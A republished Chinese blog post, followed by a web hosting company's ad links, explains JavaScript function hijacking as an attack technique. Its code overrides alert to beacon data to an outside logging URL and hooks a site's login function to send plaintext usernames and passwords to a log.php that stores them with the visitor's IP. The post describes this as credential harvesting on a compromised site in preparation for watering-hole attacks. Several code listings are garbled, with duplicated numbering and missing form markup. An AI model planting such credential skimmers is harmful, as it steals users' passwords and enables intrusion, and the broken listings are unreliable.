JavaScript函数劫持攻击原理

JavaScript 函数劫持并不是什么新颖的技术了。这两天在和同事吹牛的过程中提到了这个,就简单地再回顾回顾,以及假想在攻防的运用场景。

JavaScript 函数劫持(javascript hijacking)简介

一个简单的示例如下,主要逻辑就是,用变量 _alert保存原函数 alert,然后重写 alert 函数,在重写的函数最后调用原函数。这样得到的一个效果就是调用 alert 的时候,可以往 alert 中加入其它操作。比如如下代码中进行一个赋值。

 
 
 
    
  
  
  
  1.  
    2. 
  
  
  
  2.   var _alert = alert; 
    3. 
  
  
  
  3.   alert = function(){ 
    4. 
  
  
  
  4.     var str = "啥也不是"; 
    5. 
  
  
  
  5.     _alert(str); 
    6. 
  
  
  
  6.   } 
    7. 
  
  
  
  7.   alert(); 
    8. 
  
  
  
  8.  
    9.

日志记录

这种编程技巧常用于开发中的日志收集与格式化。既然可以劫持函数加入自己的操作,那么就可以在比较隐蔽的执行一些猥琐的操作。比如:

https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html

一文中提到的通过 Hook alert 函数来记录调用情况,或者弹一些警告信息,这样就可以记录到测试者的网络出口ip、浏览器指纹等信息也加上,没准就是日后的呈堂证供。

 
 
 
    
  
  
  
  1.    
    2. 
  
  
  
  2.   function log(s) {   
    3. 
  
  
  
  3.   var img = new Image();   
    4. 
  
  
  
  4.   imgimg.style.width = img.style.height = 0;   
    5. 
  
  
  
  5.   img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s);   
    6. 
  
  
  
  6.   }   
    7. 
  
  
  
  7.   var _alert = alert;   
    8. 
  
  
  
  8.   window.alert = function(s) {   
    9. 
  
  
  
  9.   log(alert.caller);   
    10. 
  
  
  
  10.   _alert(s);   
    11. 
  
  
  
  11.   }   
    12. 
  
  
  
  12.    
    13.

探针

在某些场景下,比如:已有权限,但是数据库中密码是加密的,无法解开。又或者需要探测目标人员访问此网站的规律。此时就可以利用劫持登录函数来记录明文的账号密码。如下示例:

onclick 事件会调用 login 函数发送请求包:

 
 
 
    
  
  
  
  1.      
    2. 
  
  
  
  2.             
     
    3. 
  
  
  
  3.             
     
    4. 
  
  
  
  4.             submit
     
    5. 
  
  
  
  5.          
    6. 
  
  
  
  6.          
    7.

可以劫持 login 函数,在发送登陆请求前,先发到探针文件中做一些记录帐号密码等操作。

 
 
 
    
  
  
  
  1. var _login=login; 
    2. 
  
  
  
  2. login = function (){ 
    3. 
  
  
  
  3.     var username = document.getElementById("username").value; 
    4. 
  
  
  
  4.     var password = document.getElementById("password").value; 
    5. 
  
  
  
  5.     $.ajax({ 
    6. 
  
  
  
  6.         url:"log.php", 
    7. 
  
  
  
  7.         type:"POST", 
    8. 
  
  
  
  8.         data:{ 
    9. 
  
  
  
  9.             "username":username, 
    10. 
  
  
  
  10.             "password":password 
    11. 
  
  
  
  11.         }, 
    12. 
  
  
  
  12.         success:console.log("1"), 
    13. 
  
  
  
  13.         error:function(){ 
    14. 
  
  
  
  14.             alert("error"); 
    15. 
  
  
  
  15.         } 
    16. 
  
  
  
  16.     }); 
    17. 
  
  
  
  17.      
    18. 
  
  
  
    19.

log.php 的内容如下:

 
 
 
    
  
  
  
  1. 
  
  
  
  2. $username = $_POST["username"]; 
    3. 
  
  
  
  3. $password = $_POST["password"]; 
    4. 
  
  
  
  4. $ip = $_SERVER['REMOTE_ADDR']; 
    5. 
  
  
  
  5. file_put_contents("./log.txt",$username." ".$password." ".$ip); 
    6.

也许在实际中更常见的表单形式应该是下面这种。

 
 
 
    
  
  
  
  1.  
    2. 
  
  
  
  2.   
     
    3. 
  
  
  
  3.   
     
    4. 
  
  
  
  4.   
     
    5. 
  
  
  
  5.  
    6.

这种表单也可以通过小小的改动,很简单的记录到信息,下面使用的是 onsubmit 事件,用如下方式即可:

 
 
 
    
  
  
  
  1.   
    2. 
  
  
  
  2.      
    3. 
  
  
  
  3.          
    4. 
  
  
  
  4.             
     
    5. 
  
  
  
  5.             
     
    6. 
  
  
  
  6.             
     
    7. 
  
  
  
  7.          
    8. 
  
  
  
  8.          
    9. 
  
  
  
  9.              
    10.

不仅可以记录密码,还可以结合前面提到的记录日志,来记录管理员的登录时间、IP、UA 和浏览器指纹等信息。这种探针常用于布置水坑攻击前针对人员登录情况的信息收集,根据收集的信息制定具体的水坑方案。

文章名称:JavaScript函数劫持攻击原理
转载来于:http://www.hantingmc.com/qtweb/news10/388110.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

外贸建站知识

同城分类信息

SSL证书    注册域名    php空间    成都多线服务器托管    成都机房机柜租用    成都二枢机房    做网站    汕尾凯敏网站    成都主机租用    网络营销推广    金羊影视传媒    成都网络推广    网站建设开发    门户网站建设方案    乐山主机托管    买友情链接    Android开发    香港空间    犀浦封阳台    迷你发光字